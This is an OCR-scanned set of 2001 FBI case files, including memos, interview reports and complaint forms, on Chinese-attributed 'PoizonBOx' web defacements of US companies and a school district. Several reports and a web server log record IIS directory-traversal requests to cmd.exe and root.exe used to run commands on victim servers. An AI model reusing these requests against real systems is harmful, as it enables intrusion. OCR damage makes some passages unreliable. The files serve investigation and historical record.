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FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) : ® 


Precedence: ROUTINE Date: 05/09/2001 
To: Memphis Attn: Squad_5 
SSA 
From: Chicago 
Squad IP/C 
Con : 312/786-3918 


Approved By: 


Drafted By: 


Case ID #: ending) 

Title: Subject: Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


a To set lead for Memphis Division, Squad 5, sat 


Administrative: Reference telephone call between sa[_ and SA 


on May 8, 2001. 


Details: Chicago Division is the lead office for the criminal 


investigation of the Honkers Union of China, sometimes called the 


Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. . 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, sa] __]contacted sa[ to inform 
that one of First Tennessee Bank's Web sites, www.ttcm.com, had 


been the victim of a Web site defacement. The statement on the 


Web site, "fuck USA Government fuck PoizonBOx 
contact: sysadmin@yahoo.com.cn", is a common statement seen on 
many of the defacements. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 
b7Cc 
b7E 


b6 
b7C 


b6 
b7c 


b3 
b6 
b7C 
b7E 


To: Memphis From: j Chicago 
re: L_] 08/08/2001 


LEAD (s): 
Set Lead 1: 
MEMPHIS 


AT MEMPHIS, TN 


It is requested that SA 
investigation, more specifically, obtain log files from the 
victim servers and provide FD 302s regarding 
log files, and forward all information to SA 


+4 


perform appropriate 


ae 


bTE 


b6 
b7¢ 


and 


(01/26/1998) | © 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 


To: Minneapolis Attn: Squ 
SSA b3 
bé 


From: Chicago b7¢C 
Squad IP/c b7E 
Contact: 


SA 12/786-3918 


Approved By: 
Drafted By: 
Case ID #: 


Title: Subject: Hacker/Honker Union of China 
Victim: Tllinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Minneapolis Division, Squad 8. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 21, 2001, sa[___]was contacted by Minneapolis b6 
Division and informed that Squad 8 was receiving numerous bic 
complaints regarding Web site defacements possibly attributable 
to Chinese hackers. Many of the sites contained the following 
statement, "fuck USA Government fuck PoizonBOx 
contact: sysadmin@yahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 
b7c 
b7E 


1410.) O4, ec 


To: Minneapolis From: Chicago 


b7E 


LEAD (s): 
Set Lead 1: 
MINNEAPOLIS 
AT MINNEAPOLIS, MN 
It is requested that Squad 8 perform appropriate 
investigation, more specifically, obtain log files from the 


victim servers and provide FD 302s regarding the defacements and 


log files, and forward all information to sat | b6 
b7C 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: Portland Attn: NIPC_Squad 
b6 
From: Chicago bic 
Squad IP/C pas 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: Pending) 


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Portland Division, NIPC Squad, SA 

| b6 
b7Cc 

suatgal on Reference telephone call between sal 


and SA on May 3, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 3, 2001, SAL______] contactea sal _|to agi 


inform that Portland Division was receiving numerous complaints EHS 
regarding Web site defacements possibly attributable to Chinese 

hackers. Many of the sites contained the following statement, 

"fuck USA Government fuck PoizonBOx 

contact: sysadmin@yahoo.com.cn", a common statement seen on many 

of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 


/34]  }S.e7 


To: Portland Frorm:” Chicago @ 
Re: 05/12/2001 b3 
b7E 
LEAD (s): 
Set head 1: 
PORTLAND 
AT PORTLAND, OR 
It is requested that sa[_ perform appropriate b6 
investigation, more specifically, obtain log files from the bic 


victim servers and provide FD 302s regarding_the defacements and 
log files, and forward all information to SA 


+4 


a e e 
(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 
To: Counterterrorism Attn: NIPC, CIiU 
SS 
Chicago SA 
From: Cleveland 
Squad 16 
CG act: SA 216.622.6867 


Approved B 
Drafted By: 


Case ID #: (Pending) ” 


Title: Unsub(s); 
MicroSystems Management - m; 
The Townsend Group - Victim; 
Impairment - Web Page Defacement 


Synopsis: Web page defacement in the Cleveland FO territory. 


06/01/2001 


Enclosure(s): One ining email messages 
and log files from 


Details: on 05/31/2001 [_C—C—~C~CSCSCdiM crc Systems 


Management, 2001 Crocker Road, Suite 460, Westlake, 


management company, advised that one of his company's web pages 
had been defaced by a hacker on 05/30/2001. The normal contents 


Ohio, 44145, 
telephone a computer service consulting and 


of the web page were replaced with the words "fuck USA Government 


fuck PoizonBOx contact:sysadmcn@yahoo.com.cn" 


was able to recover from his server the logs 


of the attack against his machine from the directory 


/winnt/system32/logfiles/w3svcl which he provided to writer via 
email (see enclosure). stated that the attack came from 
IP 


Internet Protocol Address 210.77.147.216 which he believes 


resolves to a machine in the area of Toronto, Canada. 


also advised that_a_ client of his company, 
of The Townsend Grou has als 
suftfere rom the same attack. said he would contact] _] 


and have him email the log of the attack to writer. 
Subsequently, writer received an email from 
enclosure). 


(see 


b3 
b6 
b7C 
bT7E 


b7C 


b6 
b7C 


b6 
b7C 


b7E 


To: i From: Cleveland 
Re: 06/01/2001 b3 


b7E 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 
AT CHICAGO 


This information is provided to Chicago for whatever 
investigative action is deemed appropriate. 
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: 
(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/25/2001 
ere avens ssa[ bs 
NIPC = , Room be 


b7C 


Squad IP/Cc 


From: Milwaukee 
Squad 5 
Contact: 


SA (414) 291-4254 


ed By: 
Drafted By: 


Case ID #: Pending) 
Title: HACKER/HONKER UNION OF CHINA 
ILLINOIS SECRETARY OF STATE, et al 
COMPUTER INTRUSION 
04/03/2001 


Synopsis: To provide information regarding computer intrusions 
that appeared to be perpetrated by the above-captioned subject. 


| b3 
reterence: [| bre 


Enclosure(s): Enclosed for Chicago are eight original FD-302s, 
and a copy of each, along with log records (enclosed in a "1A" 
envelope) documenting the hacks sustained by victims in the 
Milwaukee Division. 


| Details: Pursuant to notification by NIPC, Milwaukee contacted 
| Chicago regarding the umbrella investigation that Chicago is 

| conducting pertaining to the Honkers Union of China, the 
Lionworm, the Adoreworm, and other website hacks originating out 
| of China. Milwaukee received the above referenced EC from 

| Chicago, dated 05/12/2001, requesting that Milwaukee provide all 
pertinent log files and FD-302s to Chicago, with regard to the 


aforementioned investigation. At this time Milwauk is 
roviding the requested information to Chicago. a b6 
[ust be providing information on the attack sustained by bic 
Harley Davidson in a separate communication. 

It is further noted that one of the FD-302s that 


Milwaukee is providing to Chicago is with regard to intrusions 
sustained by the Abbotsford School District beginning on 


JPLOADZD BY MW 
WITH TERT 
LEADS SET 


b3 


DAT “AVI b7c 
b7E 


wdt 


To: i From: Milwaukee : 
Re: 05/25/2001 b3 


b7E 
03/12/2001 and continuing thereafter. The attacks appeared to 
originate from Indonesian Internet Protocol (IP) Addresses, 
howevér Milwaukee believes that it is worth noting, due to the 
fact that the same method of intrusion (through IIS 
vulnerabilities and use of "cmd.exe") was utilized, and also due 
to the fact that during the "China-US Hacker War" the Indonesians 
supported the Chinese by joining them in the attacks of US 
websites. Therefore, the information provided by the Abbotsford 
School District is being included in the report to Chicago in the 
event that similar information has been developed by Chicago. 
Milwaukee has referenced all of its victims in the 
"Descriptive Data" section of this communication which appears 
below. 
Milwaukee considers this lead to be covered, however 
Milwaukee stands ready to assist Chicago with any additional 
leads. Milwaukee will also provide any outstanding log records 
to Chicago upon receipt of same from victims. 
Descriptive Data: 
Reference 
Name - Century Foods 
Address(es) - 
House #: 400 
Street Name: Century 
Street Suffix: Court 
Post Direction: P.O. Box 257 
City: Sparta, 
State: WI 
Postal Code: 
Phone #: bé 
Miscellaneous - POC: b7c 
Reference 
Name - SpiritUSA 
Address(es) - 
House #: 20 
Street Name: Forest 
Street Suffix: Avenue 
City: Fond du Lac 
State: WI 
Postal Code: 
Phone #: 
Miscellaneous - POC: 


re: St. Lawrence Seminary 


C7 


To: 
Re: 


Counterterrori® 


Reference 

Name - 

Address(es) - 
House #: 


Pre Direction: 


Street Name: 


Street Suffix: 


City: 

State: 

Postal Code: 
Phone #: 
Miscellaneous - 


Reference 

Name - 

Address(es) - 
House #: 


Pre Direction: 


Street Name: 


Street Suffix: 


City: 

State: 

Postal Code: 
Phone #: 
Miscellaneous - 


Reference 

Name - 

Address(es) - 
House #: 
Street Name: 


Street Suffix: 


Unit: 

City: 

State: 

Postal Code: 
Phone #: 
Miscellaneous - 


Reference 

Name - 

Address(es) - 
House #: 
Street Name: 


Street Suffix: 


City: 

State: 

Postal Code: 
Phone #: 


From: 
05/25/2001 


Milwaukee @ 


b3 
b7E 
Excel Communications 
185 
North 
Jefferson 
Street 
Milwaukee, 
WI 
b6 
POC: Bis 


Jade Technologies 


16655 

West 
Bluemound 
Road 
Brookfield, 


Re: EC Media Group 


Gehl Company 


143 

Water 

Street 

P.O. Box 179 
West Bend, 
WI 
53095-0179 


eae | 
Point of Contact: [ 


unlisted 


Peal 


To: 
Re: 


Counterterrorim® 


Miscellaneous - 


Reference 
Name - 
Address(es) - 
House #: 
Street Name: 
Street Suffix: 
City: 
State: 
Postal Code: 
Phone #: 
Miscellaneous - 


Reference 

Name - 

Address(es) - 
House #: 
Pre Direction: 
Street Name: 
Street Suffix: 


Post Direction: 


City: 

State: 

Postal Code: 
Phone #: 
Miscellaneous - 


From: 


Milwaukee © 


05/25/2001 


Saratoga Liquor Company 


3215 
James Day 
Avenue 
Superior 


>OC: | 394-4487 st] | b6 
POC: b7c 


Abbotsford School District 


307 

North 

4th. 

Avenue 

P.O. Box 70 
Abbotsford 
WI - 


ry 


To: _Counterterrori From: Milwaukee @ 
Re: 05/25/2001 b3 


bTE 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
The Chicago Division, as the Office of Origin, is being 


left with the discretion of setting forth any leads that might be 
generated from the information that Milwaukee has provided. 


+4 
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FD-302 (Rev. 10-6-95) 


Pee 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


On 05/04/2001|_ iE CENTURY FOOD, 400 Centur 
Court, P.O. Box 257, Sparta, Wisconsin, telephone eed 
called the Milwaukee FBI Office to report that his website, 


www.centuryfoods.com or Internet Protocol (IP) Address 
24.240.63.232, had been defaced. The site is used for 
informational purposes, and the responsible party appears to have 
utilized the IP address of 62.156.34.240 on 05/03/2001 at 8:30:53 
AM Central Daylight Time (CDT), gaining access as "anonymous", 
followed by "guest@here.com". Then at 10:46:10 AM CDT on 
05/03/2001, the IP Address of 193.159.77.87 was utilized in 
creating and sending files to CENTURY's system. 


On 05/09/2001[_ sent log records, supporting the 
intrusion, along with a diskette with same information on it, and 
a "screen shot" of the defaced default webpage showing the message 
of, "Beat down Imperialism of American!----for my great fatherland 
China and my fds there...----hacked by e4t7£i3h@H.U.C". 
provided supporting documentation which reflected financial damages 
to be $1,512.35. 


ed provided log information from 05/08/2001, 
which reflected that another intrusion and website defacement had 
occurred on 05/08/2001 at 13:15:43 CDT from the IP Address of 
203.231.161.6. At this time a "GET, 
/seripts/../../winnt/system32/cmd.exe/c+dir was run on the system 
and slight variations of that command thereafter allowed root to be 
obtained several command lines later. At that time a message was 
left on the website stating, "fuck USA Government fuck PoizonBOx 
contact :sysadmcn@yahoo.com.cn." 


Investigation on 05/04/2001 at Milwaukee, WI (telephonically) 


File # 


Date dictated 05/25/2001 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


b6 
b7c 


b6 
b7C 


ees @ 6 
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aye 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


on 05/07/2001| —S——S—_—sdo fs SPERITUSA, an Pe 


Internet Service Provider and website host service, lo BIS 
t Avenue, Fond du Lac, Wisconsin 54935, telephone 
called the Milwaukee Office of the FBI to report at one oO 


his customers, ST. LAWRENCE SEMINARY of Mount Calvary, Wisconsin, 
had been hacked by PoizonBOx. Specifically, the mail server was 
affected in that people could not sign on to receive mail after the 
website was altered on 05/05/2001. ST. LAWRENCE SEMINARY did not 
maintain log records, but they were able to determine, through 
| review of the summary.htm and index.htm files, that the image was 
created at 11:33AM. [_proviaes a screen shot of the 
altered webpage, which was provided to him by ST. LAWRENCE 
| SEMINARY. This particular screen shot is difficult to read because 
of the black background, however it was noted that the last line 
reads "contact:sysadmen@yahoo.com.cn". Financial damages were 
reported to be minimal. 


Investigation on 0s /O07 /2001 at Milwaukee, WI (telephonically) 

File # Date dictated 05/25/2001 ne 
b7C 

by b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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, ae a 


; i & 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


on o5/o7/2o01[_ fo xc 
COMMUNICATIONS, 185 North Jefferson Street, Milwaukee, WI 53202, 
telephone reported that his company had sustained 
an attack on their default website with an IP Address of 
168.215.58.196. The message on their site was replaced with a 
black background and red lettering stating "fuck USA Government 
fuck PoizonBOx contact: sysadmen@yahoo.com.cn." This attack came 
through IIS and affected their mail server (209.100.161.2). 
een that they do not use their default site and tha eir 
orders were not affected. 


provided the IP Addresses that had engaged in 
this suspicious activity as 131.91.81.31 on 05/03/2001 (no time was 
provided); 210.170.24.80 on 05/06/2001 (no time provided) ; 
210.230.128.198 on 05/06/2001 (no time provided) ; 
203.175.128.10 on 05/06/2001 (no time provided). 
attempted to send his log files electronically, over the Internet, 
to an FBI e-mail account, however he LFied that it was not 
properly received by FBI Milwaukee. advised that a 
diskette and print out of the log records, along with documentation 
of damages would be forthcoming. However, to date, this 
information has not yet been received. 


Investigation on 05/07/2001 at Milwaukee, WI (telephonically) 


Date dictated 95/25/2001 


File 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


b6 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


On 05/08/2001 ee JADE TECHNOLOGIES, an ae 
Internet Service Provider SP) and web hosting service, 16655 West 
Bluemound Road, Suite 230, Brookfield, Wisconsin 53005, telephone 
Se called to report that his customer, EC MEDIA GROUP, 
sustained a website defacement on one of their internal sites, 
"http: //outlook.dmreview.com/", which is used to access mail. 
Three to four files were replaced, which replicated itself in 15 
different places, and occurred twice. A derogatory message was 
left on the website stating "fuck rnment fuck PoizonBOx 
contact: sysadmen@yahoo.com.cn." indicated that the 
customer could not provide log records because their security audit 
was not turned on. They were only able to provide a snapshot of 
their defaced screen, which they quickly replaced. Financial 
damages were said to be minimal. 


Investigation on 05/08/2001 at Milwaukee, WI (telephonically) 


File | | Date dictated Q5 / 25 / 2001 se 
b7C 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


On 05/10/2001 

for the GEHL COMPANY, 143 Water Street, P.O. Box 179, West 
Bend, WI 53095-0179, telephone called to report that 
a company owned by GEHL, known as "COMP. IPMENT ATTACHMENTS", 
was attacked at their web address of www.ceattach.com on two 
separate occasions. The first attack occurred on 04/29/2001 when 
their default "Under Construction" page was replaced with the 
PoizonBOx message. Upon discovery of same, the server 
(156.46.155.174) was formatted and reloaded with the company's 
code. This attack cost his company about $6,000.00, which includes 
internal personnel and outside consulting fees. After the incident 
a small server that contained no code and had only the "Under 
Construction" message on it, was placed on the Internet. This site 
was attacked again on 05/10/2001 and the "Under Construction" page 
was again replaced with the PoizonBOx message. 


on 98/11/2001| __] mailed a package that contained a 
diskette and print out of a pertinent log records for the 


aforementioned dates, along with a letter that provided the 
financial damages. He noted that the responsible IP Address for 
the 04/29/2001 attack was 202.104.57.245, which was registered to 
GUANG DONG RESEARCH CENTER in China and the IP address responsible 
for the attack on 05/10/2001 was 202.64.252.67, which is registered 
to a company, PROGRAM PLANNING PROFESSIONALS LIMITED in Hong Kong. 
The method utilized in the intrusion appeared to be through IIS, 
using the "cmd.exe" and then copying scripts to "root.exe." 


Investigation on 05/10/2001 at Milwaukee, WI (telephonically) 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


b6 
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b6 
b7C 


b3 
b6 
b7C 
b7E 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


reported that 
was defaced. The website 
was replace ackground and red lettering. [It 
contained ten pictures, which included pictures of WONG WEI (the 
Chinese pilot killed in the collision with the US EP-3) and voiced 


human rights concerns, with fireworks exploding in the background. 
e thought that 


the sites had been taken down by his host, DATAWAVE TECH in Wausau, 

330 Third Street, Wausau, WI 54403, telephone (715) 843-7823. 
checked the website the other day, to see if it was still 

up, and found the defaced site. did not know the date_of 

occurrence, nor did he have supporting log records on same. 

did not sustain monetary loss from this defacement, but thought 

that he should report the matter to the FBI. 


at Milwaukee, WI (telephonically) 
File # Date dictated Q5 / 25 / 2001 


05/14/2001 


Investigation on 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


On i) aes of the SARATOGA LIQUOR ne 
COMPANY, 3215 James Day Avenue, Superior, Wisconsin 54880, Rie 
telephone (715) 394-4487, ext [1 called to report that his 
company's website had been defaced, but that no serious damage was 
done. The website was replaced with a black background and a 
message in red lettering, stating "fuck the_USA Government fuck 
PoizonBOx contact: sysadmen@yahoo.com.cn. was not certain 
when the attack occurred, but he recalled checking the server on 
05/01/2001 and it was fine. He checked it again on 05/21/2001, and 
that is when he noticed that something was wrong. [____]was 
anxious to patch his system and restore the original website, so he 
did not save a screen shot of the website, nor did he have log 
records to provide on same. Financial damages were noted as being 
minimal. 


Investigation on 05/23/2001 at Milwaukee, WI (telephonically) 


b3 
File # Date dictated 05/25/2001 b6 

b7c 
by b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/2001 


On 04/25/2001[ ————S—=s@dY'sCOdé&:: thee ABBOTSFORD SCHOOL 
DISTRICT, 307 North 4th. Avenue, Abbotsford, WI 54405, telephone 
(715) 223-2386 ext.[___] called to complain that she had noticed on 
03/12/2001 that they had fallen under attack. Specifically the 
hacker attempted to replace the default page for the ABBOTSFORD 
SCHOOL DISTRICT, however the attempt failed. The responsible 
individual intended to take credit for the attack and the website 


was supposed to be rerouted to a GEOCITIES ftp server. The hack 


noticed subsequent hacks on 03/26/01 stating 
was here." Additional hacks were_also stained on 
03/29/2001; 04/07/2001 and 04/08/2001 by eons 
Also on 04/07/2001 a message was left stating "DEDI 
JANGAN BELAJAR SNIFING.NTAR PINGSAN KAUW." An attempt was also 
made to steal their password files on 04/07/2001. 


The ABBOTSFORD SCHOOL DISTRICT does not have a firewall, 
but will soon be installing one. Le still working on trying 
to get the "bugs" fixed and the hackers out of her system. The 
school district had hired some consultants from DIRK'S CONSULTING 
GROUP and is expecting to incur some financial costs from same. 

provided partial logs, via facsimile, as a sample of the 
trouble that the ABBOTSFORD SCHOOL DISTRICT had encountered. She 
advised that she would forward the detailed logs along with 
financial damages, upon compilation of same. 


Investigation on 04/25/2001 at Milwaukee, WI (telephonically) 


File # Date dictated 95/25/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 6/1/01 


Information Security 
Services, and Vice President, Computer Forensics 
Investigations, Charles Schwab & Co. Inc, 101 Montgomery 
-3-613, San Francisco, CA 94104, telephone shee ace | 
were contacted at the Charles Schwab offices at 6200 


Stoneridge Mall Drive, Pleasanton, CA by FBI Special Agents 
| inece 
advised of the identity of the agents and the purpose of the 
interview. oe denen provided the following 


information: 


The Retirement Planning Systems Data Center (RPSDC) is 
located in Akron, Ohio. The purpose of this system is to serve 
Charles Schwab customers in planning for their retirement. Also 
known as Schwabplan, it is a public site that is accessible from 
the Internet. The RPSDC was running an unpatched version of 
Windows NT IIS 4.0. 


On May 3rd, 2001 at 1:30 pm EST time a customer called 
the Help Desk to advise that the Schwabplan webpage had been 
defaced. A screen print of the defaced page is attached to and 
made a part of this document. It is a black screen with the 
following words written on it: 


fuck USA Government 
fuck PoizonBOx 
contact :sysadmcn@yahoo.com.cn 


The website was down for approximately four hours. The 
labor cost to repair this site is a couple hundred thousand 
dollars. The repairs required eleven people to work 
approximately 48 hours. A more accurate figure is being 
calculated that will include lost business costs. 


A printout of the logs was provided by Charles Schwab 
and is attached to and made a part of this document. A 
containing the weblogs was made by, signed and dated | 
The CD is contained in a 1A envelope. 


Investigation on 5/31/01 at Pleasanton, CA 
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by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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GET /scripts/root.exe 502 
GET /scripts/../../winnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Avinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
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GET /scripts/root.exe 502 
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GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..winnt/system32/cmd.exe 
GET /scripts/root.exe 502 


502 


200 
502 


502 


502 


502 


502 


502 


502 


502 


502 


w05_ex010503.log:20:16:28 
w05_ex010503.log:20:16:28 
w05_ex010503.l0g:20:16:29 
w05_ex010503.l0g:20:16:29 
w05_ex010503.l0g:20:16:34 
w05_ex010503.l0g:20:16:34 
w05_ex010503.l0g:20:16:34 
w05_ex010503.l0g:20:16:35 
w05_ex010503.l0g:20:16:35 
w05_ex010503.l09g:20:16:35 
w05_ex010503.l0g:20:16:36 
w05_ex010503.log:20:16:36 
w05_ex010503.log:20:16:37 
w05_ex010503.log:20:16:37 
w05_ex010503.log:20:16:37 
w05_ex010503.10g:20:16:38 
w05_ex010503.l0g:20:16:38 
w05_ex010503.10g:20:16:38 
w05_ex010503.10g:20:16:40 
w05_ex010503.!0g:20:16:40 
w05_ex010503.log:20:16:40 
w05_ex010503.l0g:20:16:41 
w05_ex010503.1l0g:20:16:41 
w05_ex010503.log:20:16:41 
w05_ex010503.1l0g:20:16:42 
w05_ex010503.1l0g:20:16:42 
w05_ex010503.log:20:16:42 
w05_ex010503.l0g:20:16:43 
w05_ex010503.log:20:16:43 
w05_ex010503.1l0g:20:16:43 
w05_ex010503.10g:20:16:48 
w05_ex010503.10g:20:16:48 
w05_ex010503.1og:20:16:48 
w05_ex010503.1og:20:16:49 
w05_ex010503.10g:20:16:49 
w05_ex010503.10g:20:16:49 
w05_ex010503.log:20:16:51 
w05_ex010503.1l0g:20:16:51 
w05_ex010503.log:20:16:51 
w05_ex010503.l0g:20:16:52 
w05_ex010503.log:20:16:52 
w05_ex010503.log:20:16:52 
w05_ex010503.log:20:16:57 
w05_ex010503.log:20:16:57 
w05_ex010503.log:20:16:58 
w05_ex010503.l0g:20:16:58 
w05_ex010503.l0g:20:16:59 
w05_ex010503.log:20:16:59 
w05_ex010503.log:20:17:00 


194.206.83.113 
194.206.83.113 
194.206.83.113 
194.206.83.113 
194.206.83.113 
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194.206.83.113 
194.206.83.113 
4194.206.83.113 
194.206.83.113 


GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..winnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/root.exe 502 
GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 


GET /scripts/root.exe 502 


GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/../..Avinnt/system32/cmd.exe 
GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/../..Awinnt/system32/cmd.exe 
GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /scripts/root.exe 502 

GET /index.asp 200 
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502 


502 
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502 


502 
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502 


502 


(Rev. 08-28-2000) 


w # 7 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/04/2001 


To: Chicago atten: sat 


From: San Francisco 


Squad 14B 
Contact: (510) 583-5245 ie 
Approved By: a 


Drafted By: 
Case ID #: 
Title: Hacker/Honker Union of China; 
Illinois Secretary of State - victim; 
Intrusion; 
4/3/01 


Synopsis: To provide results of lead to Chicago. 


b3 
Reference: b6é 


b7Cc 


Enclosures: One original and two copies of FD-302 dated 6/1/01 b7E 
envelope containing original notes of interview and a CD of 


weblogs for affected system. 


Details: [ i provided details of defacement of 
Schwabplan Retirement website. 


San Francisco considers this lead closed. 


+4 


b3 
b7E 


Complaint Form ' rd @ 
FD-71 (Rev. 3-27- -98) , 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Ol Negative [~] See below’ 


Subject’s name and ‘aliases Character of case 


UNSae 
CArTy bE Ml LEo rep Complainant [] Protect Source 
WL Faeh, eT, .- Ay 
ae TE 2 Tw THUS? on : Complaint received 
et 


S pe see | “Telephonic Date sl21 4 Ly Time TY p 


| Address of Subject | ynrrit ant’s, address Dive Sagan numb pal 
“, * os ited Ch He 


ad 
1 


| 


Scars, marks , ‘and other data 


: Complainant’s DOB 


Employer i Address : Telephone 


Vehicle Description 


Facts of complaint | 


Th art, oC ve Ll Gre eu Si he (compte) Was 
erlered la, udsup; possi bly Clee nese, ad te 
akto lish wessage Was tntrodued, Sie Set dont 
© courred nae de - Mary, i> — 17 2O0l. 


Do hot write in this space. 
| 


BLOCK STAMP 


: | = | Page 1 of 1 ! 
i ae e 


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 


http://msn.com/ 5/21/01 


Dov 
UXDPloadgd 


Complaint Form & é 
FD-71 (Rev. 3-27-95); ‘ 
es 


wee = 
Nee sy 2 , 
NOTE: Hand print ‘names legibly; handwriting satisfactory for remainder. 
is ot 
Indices: CI Negative | See below 
' 


Subject’s name and aliases 


Complaint received 


C] Personal [2 Telephonic Date SST / Of Time y) 


Address of Subject |. mplainant’s address and t ephone number 
| “J 4 
Va, 


SuBuny, AV7L 
SoD 


} », 
| 


Scars, marks! and other data 
i 
{ 


Employer 


Vehicle Description : 


: © ke yp nIERMET AuneysT AT SvBuay LNT AQ, 
| O A OUSED We BSeayEn UNS ACCESED WITH 6YT ? rena lSS)0N) O Said 
thick mesSages oF 7 Fock USA GovétnmboT Gud Fock PUA 


BC" Wene WERT AP LP 207.160, /Y2 SS WITN ADPITOWRC | 
MESAEE| OF CMTACT SYSADMEN | Va poo Cam, Cr Occdysed they 


LAME 
ho sae- Sender of He ypessage 10 LF BOR ./0/-F 
tracked pees Séndir 8 5 EG x ll. 


© was Gdvted Ak Complnt hrf 


Address - Telephone 


Do not write in this space. 


epee 


BLOCK STAMP 


— 


FD-302 (Rev. 10-6-95) & @ 


-l- 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/8/2001 


ricares, 161 Cherry Street, New Canaan, 
Connecticut, was advised of the as ea of the 


interviewing agent and the nature of the interview. 
provided the following information. 


Americares website is americares.org and was defaced. 


e-mailed the logs regarding the defacement to SA 
